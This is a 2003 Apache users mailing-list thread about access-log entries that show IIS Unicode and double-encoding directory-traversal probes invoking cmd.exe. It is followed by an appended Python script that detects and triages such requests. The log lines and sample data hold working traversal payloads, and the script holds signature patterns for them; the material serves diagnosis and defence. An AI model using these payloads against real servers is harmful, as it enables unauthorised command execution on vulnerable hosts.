Posted to users@httpd.apache.org by Patrick O'Neal <pa...@oneal.net> on 2003/12/05 20:01:22 UTC

Re: [users@httpd] error messages in my log

To all:

I am running Apache 2.0.47 on RH9. I have been getting these error
messages in my log for quite some time, but I haven't been too concerned
about it because they seem to have to do with MS IIS vulnerabilities. But
is that actually true? With the newfound attacks on the gentoo.org and
gnu.org servers lately, I am re-investigating this to see if it needs
addressing. Have any of you found this problem as well, and if so, what
did you do, if anything, to make it stop?

I have included a paste of my log to show you what I am talking about.

68.55.245.17 - - [05/Dec/2003:12:13:30 -0600] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1012
68.55.245.17 - - [05/Dec/2003:12:13:30 -0600] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1012
68.55.245.17 - - [05/Dec/2003:12:13:30 -0600] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1012
68.55.245.17 - - [05/Dec/2003:12:13:30 -0600] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1012
68.55.245.17 - - [05/Dec/2003:12:13:30 -0600] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 945
68.55.245.17 - - [05/Dec/2003:12:13:31 -0600] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 945
68.55.245.17 - - [05/Dec/2003:12:13:31 -0600] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1012
68.55.245.17 - - [05/Dec/2003:12:13:31 -0600] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1012

I know that the users just get a 404 error, but is that all?

-- 
Patrick O'Neal
IT GURU
Email: patrick@oneal.net


---------------------------------------------------------------------
The official User-To-User support forum of the Apache HTTP Server Project.
See <URL:http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
   "   from the digest: users-digest-unsubscribe@httpd.apache.org
For additional commands, e-mail: users-help@httpd.apache.org


Re: [users@httpd] error messages in my log

Posted by Joshua Slive <jo...@slive.ca>.
On Fri, 5 Dec 2003, Patrick O'Neal wrote:
> I am running Apache 2.0.47 on RH9. I have been getting these error
> messages in my log for quite some time, but I haven't been too concerned
> about it because they seem to have to do with MS IIS vulnerabilities. But
> is that actually true? With the newfound attacks on the gentoo.org and
> gnu.org servers lately, I am re-investigating this to see if it needs
> addressing. Have any of you found this problem as well, and if so, what
> did you do, if anything, to make it stop?
>
> I have included a paste of my log to show you what I am talking about.
>
> 68.55.245.17 - - [05/Dec/2003:12:13:30 -0600] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1012

None of the recent attacks were on HTTP server software.  From what I've
read, they were through a sniffed password, a hole in rsyncd, and a Linux
kernel flaw.

This doesn't mean, of course, that flaws in Apache are not possible.  But
your log clearly shows an IIS attack, so there is no need to worry.

Joshua.
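
A defender-side triage of log lines like the ones in this thread, added here as an example and not part of either poster's message: it tags requests carrying the overlong UTF-8 and double-encoded traversal patterns seen in the pasted log and flags any that the server answered with a non-error status. The signature names, the `needs_review` rule and the last two sample lines (documentation-range addresses) are assumptions made for illustration.

```python
import re
from collections import Counter

# Common Log Format: host ident user [time] "METHOD target PROTO" status bytes
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) \S+$')

SIGNATURES = {
    # 0xC0 and 0xC1 can never begin a valid UTF-8 sequence (overlong encoding)
    "overlong-utf8": re.compile(r"%c[01]%[0-9a-f]{2}", re.I),
    # an encoded percent sign (%25) or a doubled one hiding a second escape
    "double-encoding": re.compile(r"%25%?[0-9a-f]|%%[0-9a-f]", re.I),
    # paths that only exist on a Windows host
    "windows-target": re.compile(r"cmd\.exe|/winnt/", re.I),
}

def classify(line):
    """Return host, status, matched signature tags and a review flag."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None  # not a Common Log Format line
    host, _method, target, status = m.groups()
    tags = [name for name, rx in SIGNATURES.items() if rx.search(target)]
    # A probe answered with a status below 400 was not rejected: look at it.
    return {"host": host, "status": int(status), "tags": tags,
            "needs_review": bool(tags) and int(status) < 400}

def summarize(lines):
    """Count probes per source host and collect those that were not rejected."""
    hits = [r for r in map(classify, lines) if r and r["tags"]]
    return Counter(r["host"] for r in hits), [r for r in hits if r["needs_review"]]

# First four lines come from the post (rejoined); the last two are constructed.
SAMPLE = '''\
68.55.245.17 - - [05/Dec/2003:12:13:30 -0600] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1012
68.55.245.17 - - [05/Dec/2003:12:13:30 -0600] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 945
68.55.245.17 - - [05/Dec/2003:12:13:31 -0600] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1012
68.55.245.17 - - [05/Dec/2003:12:13:31 -0600] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1012
192.0.2.10 - - [05/Dec/2003:12:14:02 -0600] "GET /index.html HTTP/1.0" 200 2326
192.0.2.20 - - [05/Dec/2003:12:14:05 -0600] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 512
'''.splitlines()

if __name__ == "__main__":
    per_host, review = summarize(SAMPLE)
    print("probes per host:", dict(per_host))
    for r in review:
        print("REVIEW:", r)
```

Every line from the post comes back tagged but with status 400 or 404, so nothing lands in the review list; only the constructed 200 line does.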
